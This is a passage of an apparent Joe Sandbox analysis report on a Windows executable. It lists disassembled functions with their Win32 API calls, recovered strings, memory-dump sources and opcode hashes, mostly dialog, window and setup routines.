                                                                                          • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ExitProcesslstrcat
                                                                                          • String ID: 0x%p
                                                                                          • API String ID: 2530384128-1745605757
                                                                                          • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                                          • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                                          • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                                          • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00407DB6
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                                          • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                                            • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                                            • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                          • String ID: A
                                                                                          • API String ID: 1557639607-3554254475
                                                                                          • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                                          • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                                          • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                                          • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                                            • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                                            • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                          • String ID: SetEnvironment
                                                                                          • API String ID: 612612615-360490078
                                                                                          • Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                                          • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                                          • Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                                          • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$lstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2031685711-0
                                                                                          • Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                                          • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                                          • Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                                          • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                                          APIs
                                                                                            • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                                            • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$??3@
                                                                                          • String ID: 100%%
                                                                                          • API String ID: 2562992111-568723177
                                                                                          • Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                                          • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                                          • Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                                          • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                                          APIs
                                                                                            • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                                            • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                                          • wsprintfW.USER32 ref: 00404F19
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$??3@wsprintf
                                                                                          • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                                          • API String ID: 1174869416-1550840741
                                                                                          • Opcode ID: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                                          • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                                          • Opcode Fuzzy Hash: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                                          • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                                          • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                                          • _wcsnicmp.MSVCRT ref: 0040423D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$_wcsnicmp
                                                                                          • String ID: Mg@
                                                                                          • API String ID: 2823567412-3680729969
                                                                                          • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                                          • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                                          • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                                          • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                          • API String ID: 2574300362-3900151262
                                                                                          • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                                          • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                                          • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                                          • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                          • API String ID: 2574300362-736604160
                                                                                          • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                                          • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                                          • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                                          • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                                          APIs
                                                                                          • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                                          • memcpy.MSVCRT(00000000,00AAA638,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00AAA638,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3462485524-0
                                                                                          • Opcode ID: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                                          • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                                          • Opcode Fuzzy Hash: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                                          • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                                          APIs
                                                                                            • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                                            • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                                            • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                                          • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                                          • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                                            • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                                            • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                                            • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                                            • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                                            • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                                            • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                                            • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                                            • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                                            • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                                            • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                                            • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                                            • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                                            • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                                            • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                                          • String ID:
                                                                                          • API String ID: 3043669009-0
                                                                                          • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                                          • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                                          • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                                          • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                                          • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                                          • DeleteObject.GDI32(00000000), ref: 00407126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                          • String ID:
                                                                                          • API String ID: 1900162674-0
                                                                                          • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                                          • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                                          • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                                          • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                                          APIs
                                                                                          • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                                          • GetClientRect.USER32(?,?), ref: 004085C2
                                                                                          • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                                            • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                                          • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                          • String ID:
                                                                                          • API String ID: 3015594791-0
                                                                                          • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                                          • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                                          • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                                          • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                                          APIs
                                                                                            • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                                            • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@TextWindow$Length
                                                                                          • String ID:
                                                                                          • API String ID: 2308334395-0
                                                                                          • Opcode ID: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                                          • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                                          • Opcode Fuzzy Hash: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                                          • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                          • String ID:
                                                                                          • API String ID: 2001801573-0
                                                                                          • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                                          • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                                          • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                                          • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 00401D92
                                                                                          • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                                          Memory Dump Source
